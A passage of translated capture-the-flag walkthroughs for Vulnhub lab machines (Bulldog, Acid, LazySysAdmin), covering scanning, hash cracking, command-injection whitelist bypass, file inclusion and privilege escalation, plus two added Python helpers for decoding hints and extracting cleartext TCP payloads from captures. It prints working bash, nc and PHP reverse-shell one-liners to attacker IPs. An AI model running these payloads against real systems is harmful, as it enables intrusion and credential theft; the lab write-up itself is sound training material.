It's not like a hacker can do anything with a hash.</p><p>(2) The hashes are 40 characters long, which identifies them as SHA-1. Even without knowing the algorithm, each hash can be tried against CMD5's lookup tables:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/9.png' alt='' referrerPolicy='no-referrer' /></p><p>(3) Two of the hashes resolve:</p><p>Back End: <a href='mailto:nick@bulldogindustries.com' target='_blank' class='url'>nick@bulldogindustries.com</a></p><p>Username: nick, password: bulldog (CMD5 resolves it for free)</p><p>Database: <a href='mailto:sarah@bulldogindustries.com' target='_blank' class='url'>sarah@bulldogindustries.com</a></p><p>Username: sarah, password: bulldoglover (CMD5 charges for this one)</p><ul><li>Step 3: log into the backend</li></ul><p>(1) The recovered passwords all fail against the SSH service found on port 23:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/10.png' alt='' referrerPolicy='no-referrer' /></p><p>(2) sarah with password bulldoglover logs into the admin backend, but has no edit rights.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/11.png' alt='' referrerPolicy='no-referrer' /></p><p>(3) Visiting the webshell page again, the session is now authenticated and commands can be run; it is a command execution interface:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/12.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7938' class='md-header-anchor '></a>Getting a shell</h2><ul><li>Step 4: bypass the whitelist and run system commands: </li></ul><p>The webshell page only runs whitelisted commands; try chaining several commands with ; or &&:</p><p>ls is whitelisted and id is forbidden, yet <code>ls && id</code> runs id, so the whitelist is bypassed by chaining.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/13.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>Step 5: reverse shell: </li></ul><p>(1) Start an nc listener on the Windows attacking machine: <code>nc -lvnp 4444</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/14.png' alt='' referrerPolicy='no-referrer' /></p><p>(2) Running <code>ls && bash -i >& /dev/tcp/172.20.10.5/4444 0>&1</code> directly fails; the server returns a 500 error.</p><p><img 
src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/15.png' alt='' referrerPolicy='no-referrer' /></p>
<p>(3) After several failed bash reverse-shell attempts, what finally worked was to echo the command and pipe it into bash:</p>
<p><code>echo "bash -i >& /dev/tcp/172.20.10.5/4444 0>&1" | bash</code></p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/25.png' alt='' referrerPolicy='no-referrer' /></p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/16.png' alt='' referrerPolicy='no-referrer' /></p>
<h2><a name='header-n7969' class='md-header-anchor '></a>Privilege escalation</h2>
<ul><li>Step 6: list the system users with <code>cat /etc/passwd</code>; the users of interest are bulldogadmin and django</li></ul>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/17.png' alt='' referrerPolicy='no-referrer' /></p>
<ul><li>Step 7: find each user's files, suppressing errors: <code>find / -user bulldogadmin 2>/dev/null</code></li></ul>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/18.png' alt='' referrerPolicy='no-referrer' /></p>
<p>(1) Two files stand out: note and customPermissionApp.</p>
<p>/home/bulldogadmin/.hiddenadmindirectory/note</p>
<p>/home/bulldogadmin/.hiddenadmindirectory/customPermissionApp</p>
<p>(2) Open the note text file: it hints that the webserver sometimes needs root access.</p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/19.png' alt='' referrerPolicy='no-referrer' /></p>
<p>(3) customPermissionApp looks like an executable; use strings to print its printable characters:</p>
<p><code>strings /home/bulldogadmin/.hiddenadmindirectory/customPermissionApp</code></p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/20.png' alt='' referrerPolicy='no-referrer' /></p>
<p>The note hints that running this file gives root, but ls shows the file is only readable, not executable.</p>
<ul><li>Step 8: assemble the root password and escalate</li></ul>
<p>(1) The file contains only these strings, which look password-related. The English words are SUPER, ultimate, PASSWORD and youCANTget, all suggestive of the highest-privileged account, so this is presumably a puzzle:</p>
<p><img 
src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/21.png' alt='' referrerPolicy='no-referrer' /></p>
<p>The most direct combination is to drop the H characters, giving a readable English sentence: SUPERultimatePASSWORDyouCANTget</p>
<p>(2) The su command cannot be run; it reports: must be run from a terminal. This problem came up in the previous Vulnhub box and is solved with one line of Python:</p>
<p><code>python -c 'import pty;pty.spawn("/bin/bash")'</code></p>
<p>(3) Run <code>sudo su -</code> to obtain root and read the flag:</p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/22.png' alt='' referrerPolicy='no-referrer' /></p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/23.png' alt='' referrerPolicy='no-referrer' /></p>
<p>(4) If the su problem is not solved, remember that SSH is on port 23: you can also log in over SSH with Xshell, then run sudo su - to escalate and get the flag</p>
<p>Username: <code>django</code></p>
<p>Password: <code>SUPERultimatePASSWORDyouCANTget</code>. Instead of using the guessed password, changing django's password first and then logging in also works.</p>
<p>Escalate with sudo su; the password is: <code>SUPERultimatePASSWORDyouCANTget</code></p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/24.png' alt='' referrerPolicy='no-referrer' /></p>
<h2><a name='header-n8033' class='md-header-anchor '></a>Box walkthrough review</h2>
<p>1. Directory brute-forcing reveals the dev and admin pages:</p>
<p>(1) The dev page can be brute-forced; its source contains the usernames, e-mail addresses and SHA-1 password hashes of several accounts. The page also links to the webshell command-execution page.</p>
<p>(2) The admin backend page can be brute-forced; its login password is obtained by cracking the SHA-1 hashes from the dev page.</p>
<p>2. Bypassing the whitelist to run commands and get a reverse shell: bypassing the restriction is fairly easy. The reverse shell worked after several attempts with bash; a Python shell was not tried.</p>
<p>3. Searching for files owned by users with UID 1000 and above turns up hidden files.</p>
<p>4. Guessing the root password is hard.</p>
<h2><a name='header-n8046' class='md-header-anchor '></a>Summary</h2>
<h3><a name='header-n8047' class='md-header-anchor '></a>Difficulties and pitfalls</h3>
<p>(1) Finding and cracking the SHA-1 hashes: after viewing the dev page source and finding several user hashes, even without recognising the 40-character SHA-1 format you can submit them straight to cmd5, which identifies the type automatically, and two accounts can be recovered. Brute-forcing the SHA-1 with hashcat would need a strong wordlist and a long time.</p>
<p>(2) There should be several ways to get a reverse shell: bash was the first that came to mind, and a Python reverse shell also. Only bash was tried; if bash does not work, you could echo a script file onto the system, give it +x, and run the script, or test whether Python can spawn a reverse shell.</p>
<p>(3) Finding the hidden file with the root password: searching the files of users with UID 1000 and above, checking command history, or browsing directories may also lead to it.</p>
<p>(4) Guessing the root password: this is the hardest part. Finding the file is not difficult, but reading its contents with strings and assembling the fragments into the root password felt very hard.</p>
<h1><a name='header-n8056' class='md-header-anchor '></a>Section 4: Acid</h1>
<pre><code>Author: 紅日安全
First published on 安全客: https://www.anquanke.com/post/id/10546</code></pre>
<h2><a name='header-n8058' class='md-header-anchor '></a>Target information</h2>
<h3><a name='header-n8059' class='md-header-anchor '></a>Download link</h3>
<p><a 
href='https://download.vulnhub.com/acid/Acid.rar' target='_blank' class='url'>https://download.vulnhub.com/acid/Acid.rar</a></p>
<h3><a name='header-n8062' class='md-header-anchor '></a>Target description</h3>
<p>Welcome to the world of Acid. Fairy tails uses secret keys to open the magical doors.</p>
<h3><a name='header-n8068' class='md-header-anchor '></a>Goal</h3>
<p>Obtain root privileges and the flag.</p>
<h3><a name='header-n8071' class='md-header-anchor '></a>Environment</h3>
<ul><li>Target setup: the VM is entirely web-based; extract the rar and run the vmx with VMware Player, set the network connection to NAT, and the target obtains an IP automatically.</li><li>Attack machine setup: a Windows attack machine on the same subnet with Burp Suite, nc, Python 2.7, DirBuster, 御劍 and other penetration-testing tools installed.</li></ul>
<h2><a name='header-n8082' class='md-header-anchor '></a>Information gathering</h2>
<ul><li>IP discovery</li></ul>
<p>Start the Acid VM. Since networking is in NAT mode, scanning the NAT subnet of the VMware Network Adapter VMnet8 interface with Nmap finds the VM's IP; the result is saved to a txt file with the command:</p>
<p><code>nmap -sP 192.168.64.0/24 -oN acid-ip.txt</code></p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/1.png' alt='' referrerPolicy='no-referrer' /></p>
<p>Target IP: <code>192.168.64.153</code></p>
<ul><li>Port scan</li></ul>
<p>Scan all ports 1-65535 with nmap, with service fingerprinting, saving the result to a txt file:</p>
<p><code>nmap -p1-65535 -sV -oN acid-port.txt 192.168.64.153</code></p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/2.png' alt='' referrerPolicy='no-referrer' /></p>
<p>A web service is found on port 33447 of the target; the web server is Apache 2.4.10 and the operating system is Ubuntu.</p>
<p><code>http://192.168.64.153:33447</code> opens the home page:</p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/3.png' alt='' referrerPolicy='no-referrer' /></p>
<ul><li>Service identification</li></ul>
<p>Only the web service and Apache were found, so the way in must be a web or Apache vulnerability (if one exists):</p>
<p>Port: TCP 33447</p>
<p>Underlying service: Apache 2.4.10</p>
<p>Operating system: Ubuntu</p>
<h2><a name='header-n8124' class='md-header-anchor '></a>Detailed approach to vulnerability hunting</h2>
<ul><li>Web approach:</li></ul>
<p>(1) View the source of every page and look for hints;</p>
<p>(2) Brute-force directories with 御劍 or DirBuster to discover new pages, then look for vulnerabilities in them;</p>
<ul><li>Apache approach:</li></ul>
<p>(1) Check whether Apache 2.4.10 has any known exploitable vulnerability: none directly usable was found.</p>
<p>(2) Search <a href='http://www.exploit-db.com' target='_blank' class='url'>www.exploit-db.com</a> for an exploit: none found.</p>
<p>(3) 
Scan the host with Nessus: no vulnerabilities found.</p>
<ul><li>If no vulnerability can be found at all: boot Ubuntu into single-user mode and read the source.</li></ul>
<ul><li>Step 1: first view the home page source, which contains the hint: 0x643239334c6d70775a773d3d</li></ul>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/4.png' alt='' referrerPolicy='no-referrer' /></p>
<p>The 0x prefix marks hexadecimal; decoding 643239334c6d70775a773d3d from ASCII hex gives: d293LmpwZw==</p>
<p>That is base64; decoding it gives the image name wow.jpg</p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/5.png' alt='' referrerPolicy='no-referrer' /></p>
<p>From experience, you can now try appending a directory to the home URL: /image/wow.jpg, /images/wow.jpg or /icon/wow.jpg, since image directories are usually named this way. Alternatively, brute-force directories with DirBuster to find the images directory.</p>
<ul><li>Visiting <code>http://192.168.64.153:33447/images/wow.jpg</code> returns the image:</li></ul>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/6.png' alt='' referrerPolicy='no-referrer' /></p>
<ul><li>Save the image locally and open it in Notepad++; there is a hint at the very bottom</li></ul>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/7.png' alt='' referrerPolicy='no-referrer' /></p>
<p>Decoding 3761656530663664353838656439393035656533376631366137633631306434 from ASCII hex gives 7aee0f6d588ed9905ee37f16a7c610d4, which is an MD5 hash.</p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/8.png' alt='' referrerPolicy='no-referrer' /></p>
<p>Looking it up on cmd5 gives 63425, presumably a password or an ID.</p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/9.png' alt='' referrerPolicy='no-referrer' /></p>
<ul><li>Step 2: brute-force directories with DirBuster:</li></ul>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/10.png' alt='' referrerPolicy='no-referrer' /></p>
<p>Results: a challenge directory containing cake.php, include.php and hacked.php. With Burp Suite set up as a proxy, visit the three files in turn from Firefox:</p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/11.png' alt='' referrerPolicy='no-referrer' /></p>
<ul><li>Step 3: visit cake.php; it requires login before it can be viewed:</li></ul>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/12.png' alt='' referrerPolicy='no-referrer' /></p>
<p>Looking at the page title, or at <code>&lt;title&gt;/Magic_Box&lt;/title&gt;</code> in the Burp Suite response, reveals that a /Magic_Box directory exists; look at the other pages first.</p>
<p>Clicking login redirects to the index.php login page, which needs an email and password:</p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/13.png' alt='' referrerPolicy='no-referrer' /></p>
<ul><li>Step 4: visit include.php, a page with a file-inclusion vulnerability:</li></ul>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/14.png' alt='' referrerPolicy='no-referrer' /></p>
<p>Entering /etc/passwd in the input box confirms the file inclusion; Burp Suite shows the response:</p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/15.png' alt='' referrerPolicy='no-referrer' /></p>
<p>Getting a shell through the file inclusion would need an upload point, but there is none, and the wow.jpg found earlier contains no webshell to include. Move on to hacked.php.</p>
<ul><li>Step 5: visit cake.php, which asks for an ID; try the number decoded from wow.jpg earlier: 63425</li></ul>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/16.png' alt='' referrerPolicy='no-referrer' /></p>
<p>Nothing happens; either the ID is wrong, or a login through the index page with an email and password is required first.</p>
<ul><li>Step 6: look for injection. All the discovered pages were scanned with AWVS and no injection was found.</li></ul>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/17.png' alt='' referrerPolicy='no-referrer' /></p>
<ul><li>Step 7: continue brute-forcing the discovered Magic_Box directory: low.php and command.php are found</li></ul>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/18.png' alt='' referrerPolicy='no-referrer' /></p>
<ul><li>Step 8: low.php is an empty page; command.php is a command-execution interface:</li></ul>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/19.png' alt='' referrerPolicy='no-referrer' /></p>
<p>System commands can be run: entering 192.168.64.1;id and checking the Burp Suite response shows that the id command executed successfully.</p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/20.png' alt='' referrerPolicy='no-referrer' /></p>
<h2><a name='header-n8247' class='md-header-anchor '></a>Getting a shell</h2>
<ul><li>Step 9: reverse shell via PHP. Start nc on Windows listening on port 4444:</li></ul>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/21.png' alt='' referrerPolicy='no-referrer' /></p>
<p>To avoid escaping and truncation, payloads entered in GET or POST requests must be URL-encoded. The bash and nc reverse-shell payloads below both failed:</p>
<p><code>bash -i >& /dev/tcp/192.168.64.1/4444 0>&1</code></p>
<p><code>nc -e /bin/bash  -d 192.168.64.1 4444</code></p>
<p>The PHP reverse shell succeeded: URL-encode the following payload and send it from Burp:</p>
<p><code>php -r '$sock=fsockopen("192.168.64.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'</code></p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/22.png' alt='' referrerPolicy='no-referrer' /></p>
<p>nc receives the reverse shell:</p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/23.png' alt='' referrerPolicy='no-referrer' /></p>
<p>But su cannot be run; it responds su: must be run from a terminal, so a terminal is needed. No solution came to mind; a Google search gave the answer: use Python to spawn a local shell:</p>
<p><code>echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py</code></p>
<p><code>python /tmp/asdf.py</code></p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/24.png' alt='' referrerPolicy='no-referrer' /></p>
<p>su now succeeds:</p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/25.png' alt='' referrerPolicy='no-referrer' /></p>
<h2><a name='header-n8282' class='md-header-anchor '></a>Privilege escalation</h2>
<ul><li>Step 10: list the users with <code>cat /etc/passwd</code>; the users of interest are acid, saman and root</li></ul>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/26.png' alt='' referrerPolicy='no-referrer' /></p>
<ul><li>Step 11: find each user's files, suppressing errors: <code>find / -user acid 2>/dev/null</code></li></ul>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/27.png' alt='' referrerPolicy='no-referrer' /></p>
<p>The file /sbin/raw_vs_isi/hint.pcapng is found; it is a network capture, so copy it to Kali and open it in Wireshark:</p>
<p><code>scp 
/sbin/raw_vs_isi/hint.pcapng root@10.10.10.140:/root/</code></p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/28.png' alt='' referrerPolicy='no-referrer' /></p>
<p>Looking only at the TCP packets reveals saman's password: 1337hax0r</p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/29.png' alt='' referrerPolicy='no-referrer' /></p>
<ul><li>Step 12: su to saman, then root, and obtain the flag</li></ul>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/30.png' alt='' referrerPolicy='no-referrer' /></p>
<p>Then use sudo -i to escalate to root; the password is again 1337hax0r, and flag.txt is in the root directory.</p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/31.png' alt='' referrerPolicy='no-referrer' /></p>
<h2><a name='header-n8316' class='md-header-anchor '></a>Box walkthrough review</h2>
<p>The box author's design can be compared with this overseas walkthrough: <code>http://resources.infosecinstitute.com/acid-server-ctf-walkthrough</code>
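</p>
<p>Step 1 above decodes two hints by hand: the 0x-prefixed ASCII hex on the home page, which unwraps to base64 and then to the filename wow.jpg, and the ASCII hex appended to the image, which unwraps to an MD5 digest. The script below is an added worked example, not code from the original write-up or from the box: it repeats that decoding chain on the exact hint strings from the page, adds a length-based guess of the hash type (the same "40 characters, so SHA-1" reasoning used in the Bulldog section, which the page notes CMD5 performs automatically), and checks a single candidate plaintext against the MD5 digest locally instead of through CMD5. The function names are this example's own.</p>

```python
"""Decode the layered hints from the Acid walkthrough.

Added worked example, not code from the original write-up or from the box.
It repeats, in code, the manual steps above: the 0x-prefixed ASCII hex on the
home page unwraps to base64 and then to a filename, and the ASCII hex at the
end of wow.jpg unwraps to an MD5 digest. A length-based guess of the hash
type and a local single-candidate MD5 check are added; all helper names
below are this example's own.
"""
import base64
import binascii
import hashlib

# Hint strings exactly as they appear in the walkthrough above.
HOMEPAGE_HINT = "0x643239334c6d70775a773d3d"
IMAGE_TRAILER_HINT = "3761656530663664353838656439393035656533376631366137633631306434"


def strip_hex_prefix(value):
    """Accept '0x...' or bare hex and return just the hex digits."""
    value = value.strip()
    return value[2:] if value.lower().startswith("0x") else value


def ascii_hex_decode(value):
    """Turn an ASCII-hex string such as '643239...' into the text it spells."""
    return bytes.fromhex(strip_hex_prefix(value)).decode("ascii")


def looks_like_base64(value):
    """Strict round-trip test: decode with validation, re-encode, compare.
    Plain text such as 'wow.jpg' fails this, so the chain stops there."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return False
    return base64.b64encode(raw).decode("ascii") == value


def guess_hash_type(digest):
    """Map a hex digest's length to the usual unsalted algorithm of that
    size (32 hex chars -> MD5, 40 -> SHA-1, and so on)."""
    by_len = {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}
    if digest and all(c in "0123456789abcdef" for c in digest.lower()):
        return by_len.get(len(digest), "unknown")
    return "not-hex"


def decode_homepage_hint(hint):
    """0x... -> ASCII hex -> base64 -> plain text (the image filename)."""
    layer1 = ascii_hex_decode(hint)
    if not looks_like_base64(layer1):
        raise ValueError(f"intermediate value is not base64: {layer1!r}")
    return base64.b64decode(layer1).decode("ascii")


def decode_image_hint(hint):
    """ASCII hex -> hex digest, plus a guess of which hash function made it."""
    digest = ascii_hex_decode(hint)
    return digest, guess_hash_type(digest)


def md5_matches(candidate, digest):
    """Check one candidate plaintext against an MD5 digest. CMD5 answers the
    same question from a precomputed table; here it is one local hash."""
    return hashlib.md5(candidate.encode()).hexdigest() == digest.lower()


if __name__ == "__main__":
    print("home page hint ->", decode_homepage_hint(HOMEPAGE_HINT))
    digest, kind = decode_image_hint(IMAGE_TRAILER_HINT)
    print("image trailer  ->", digest, f"({kind})")
    print("63425 is the MD5 preimage:", md5_matches("63425", digest))
```

<p>Running it prints the image name, the digest with its guessed type, and whether 63425 (the value cmd5 returned above) is the MD5 preimage of the digest. The base64 check is a strict round-trip so that hex which merely happens to decode to printable text is not mistaken for a further encoding layer.</p>
<p>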
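</p>
<p>Step 11 above finds saman's password by viewing only the TCP packets of hint.pcapng in Wireshark. The script below is an added example, not code from the original write-up or from the box: it performs that same filtering with nothing but Python's struct module, walking a capture, skipping non-IPv4 frames, non-TCP packets and empty segments, and returning the TCP payloads so cleartext credentials can be searched for. It reads the classic libpcap format rather than pcapng (an assumption made to keep the parser short), and the capture it parses is constructed inline so it runs offline: every MAC address, IP address, port and payload in SAMPLE_PCAP is made up, including the FTP-style login exchange.</p>

```python
"""Extract cleartext TCP payloads from a packet capture.

Added example, not code from the original write-up or from the Acid box.
Reads the classic libpcap format (not pcapng; an assumption made to keep the
parser short) and returns only the TCP payloads, which is the 'look only at
TCP packets' step done by hand in Wireshark above. The capture parsed at the
bottom is constructed inline and every value in it is made up.
"""
import struct

ETH_HDR_LEN = 14
ETHERTYPE_IPV4 = 0x0800
PROTO_TCP = 6
PROTO_UDP = 17
PCAP_MAGIC_LE = 0xA1B2C3D4  # little-endian classic pcap, microsecond timestamps


def _ipv4_frame(src, sport, dst, dport, payload, proto=PROTO_TCP):
    """Build a minimal Ethernet/IPv4/{TCP,UDP} frame for the sample capture.
    Checksums are left at zero; the parser below never verifies them."""
    def ip(addr):
        return bytes(int(octet) for octet in addr.split("."))
    if proto == PROTO_TCP:  # data offset 5 words, flags PSH|ACK
        l4 = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0)
    else:
        l4 = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0)
    total_len = 20 + len(l4) + len(payload)
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 1, 0, 64, proto, 0,
                         ip(src), ip(dst))
    eth_hdr = bytes.fromhex("0a0000000002") + bytes.fromhex("0a0000000001")  # made-up MACs
    return eth_hdr + struct.pack("!H", ETHERTYPE_IPV4) + ip_hdr + l4 + payload


def build_pcap(frames):
    """Classic libpcap file: 24-byte global header, then a 16-byte record
    header in front of every frame. Link type 1 is Ethernet."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC_LE, 2, 4, 0, 0, 65535, 1)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1500000000 + i, 0, len(frame), len(frame)) + frame
    return out


def tcp_payloads(pcap):
    """Return (src, sport, dst, dport, payload) for every IPv4/TCP packet that
    carries data. Non-IPv4 frames, non-TCP packets and empty segments are
    skipped, which is the 'look only at TCP' filtering done by hand above."""
    if struct.unpack("<I", pcap[:4])[0] != PCAP_MAGIC_LE:
        raise ValueError("not a little-endian classic pcap file")
    pos, records = 24, []
    while pos + 16 <= len(pcap):
        _ts_sec, _ts_usec, incl_len, _orig_len = struct.unpack("<IIII", pcap[pos:pos + 16])
        frame = pcap[pos + 16:pos + 16 + incl_len]
        pos += 16 + incl_len
        if len(frame) < ETH_HDR_LEN + 20 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
            continue
        ip_pkt = frame[ETH_HDR_LEN:]
        ihl = (ip_pkt[0] & 0x0F) * 4
        total_len = struct.unpack("!H", ip_pkt[2:4])[0]
        if ip_pkt[9] != PROTO_TCP:
            continue
        src = ".".join(str(b) for b in ip_pkt[12:16])
        dst = ".".join(str(b) for b in ip_pkt[16:20])
        tcp_seg = ip_pkt[ihl:total_len]
        sport, dport = struct.unpack("!HH", tcp_seg[:4])
        data_offset = (tcp_seg[12] >> 4) * 4
        payload = tcp_seg[data_offset:]
        if payload:
            records.append((src, sport, dst, dport, payload))
    return records


def grep_payloads(pcap, needle):
    """Return the TCP payloads that contain needle: a quick cleartext hunt."""
    return [rec[4] for rec in tcp_payloads(pcap) if needle in rec[4]]


# Constructed three-packet capture: a UDP packet, an empty TCP ACK and one TCP
# segment with a made-up FTP-style login (FTP sends credentials in cleartext).
SAMPLE_PCAP = build_pcap([
    _ipv4_frame("192.168.0.5", 5353, "224.0.0.251", 5353, b"mdns-noise", PROTO_UDP),
    _ipv4_frame("192.168.0.5", 40000, "192.168.0.100", 21, b""),
    _ipv4_frame("192.168.0.5", 40000, "192.168.0.100", 21, b"USER saman\r\nPASS 1337hax0r\r\n"),
])

if __name__ == "__main__":
    for src, sport, dst, dport, payload in tcp_payloads(SAMPLE_PCAP):
        print(f"{src}:{sport} -> {dst}:{dport} {payload!r}")
```

<p>Only the third packet survives the filter, and grep_payloads(SAMPLE_PCAP, b"PASS ") returns its payload; the UDP packet and the empty ACK are dropped just as they would be ignored in the Wireshark view. The same walk works on a real capture opened with open(path, "rb").read(), provided it is in the classic format (tshark or Wireshark can save a pcapng file as pcap).</p>
<p>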
The main breakthrough points are:</p>
<p>1. Two rounds of directory brute-forcing: the first reveals the challenge directory with cake.php, include.php and hacked.php; the second, on the Magic_Box directory, reveals command.php.</p>
<p>2. After finding the command-execution interface, use a PHP reverse shell; the payload has to be URL-encoded to travel over HTTP.</p>
<p>3. su needs a terminal; without prior experience this could only be solved with Google.</p>
<p>4. Privilege escalation came from searching known users' files and finding their password; no exploit or msf was used.</p>
<h2><a name='header-n8329' class='md-header-anchor '></a>Summary</h2>
<h3><a name='header-n8333' class='md-header-anchor '></a>Main takeaways</h3>
<ol start='' ><li>A command-execution vulnerability can be used for a PHP reverse shell; previously only bash or nc were used.</li><li>su needs a terminal; solved with Python.</li><li>After getting a shell, search every user's files thoroughly; there may be new findings.</li></ol>
<h3><a name='header-n8344' class='md-header-anchor '>;</a>Pitfalls</h3>
<ol start='' ><li>File-inclusion vulnerability: no way to exploit it was found and there was no upload point, so no shell could be obtained through inclusion;</li><li>su needs a terminal; lacking the knowledge and experience, this was solved with guidance from more experienced people and Google.</li><li>The way to obtain the email username and password from the index.php page is too obscure; without the overseas tutorial I could not have thought of it.</li><li>Brute-force every directory you find: the default 御劍 dictionary is not enough, only the OWASP wordlist works. Directory brute-forcing bypassed the email and password login above and led straight to the command-execution page.</li></ol>
<p>In short, without Google and guidance from others I could not finish this box on my own; going forward I need to broaden my thinking and practise more.</p>
<h1><a name='header-n8362' class='md-header-anchor '></a>Section 5: LazySysAdmin: 1</h1>
<h2><a name='header-n8364' class='md-header-anchor '></a>Target information</h2>
<h3><a name='header-n8365' class='md-header-anchor '></a>Download link</h3>
<p><a href='https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip' target='_blank' class='url'>https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip</a></p>
<h3><a name='header-n8368' class='md-header-anchor '></a>Environment</h3>
<ul><li>VirtualBox (either of the two)</li><li>VMware Workstation Player</li></ul>
<h3><a name='header-n8376' class='md-header-anchor '></a>Hints</h3>
<ul><li>Enumeration is key</li><li>Try Harder</li><li>Look in front of you</li><li>Tweet @togiemcdogie if you need more hints</li></ul>
<h2><a name='header-n8390' class='md-header-anchor '></a>Information gathering</h2>
<h3><a name='header-n8391' class='md-header-anchor '></a>IP discovery</h3>
<p>For host discovery on the local network, netdiscover can be used.</p>
<p><code>netdiscover -i wlo1</code></p>
<pre><code class="language-bash">➜  evilk0 netdiscover -i wlo1

Currently scanning: 192.168.21.0/16   |   Screen View: Unique Hosts

 1 Captured ARP Req/Rep packets, from 1 hosts.   Total size: 42
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.0.100   08:00:27:da:8a:ac      1      42  PCS Systemtechnik GmbH
</code></pre>
<h3><a name='header-n8397' class='md-header-anchor '></a>Port scan</h3>
<p>Scan with masscan</p>
<p><code>masscan 192.168.0.100 -p 1-10000 --rate=1000</code></p>
<pre><code class="language-bash">➜  evilk0 masscan 192.168.0.100 -p 1-10000 --rate=1000

Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2018-01-31 12:53:27 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [10000 ports/host]
Discovered open port 3306/tcp on 192.168.0.100
Discovered open port 6667/tcp on 192.168.0.100
Discovered open port 22/tcp on 192.168.0.100
Discovered open port 139/tcp on 192.168.0.100
Discovered open port 80/tcp on 192.168.0.100
Discovered open port 445/tcp on 192.168.0.100
</code></pre>
<p>Scan with nmap</p>
<p>nmap 
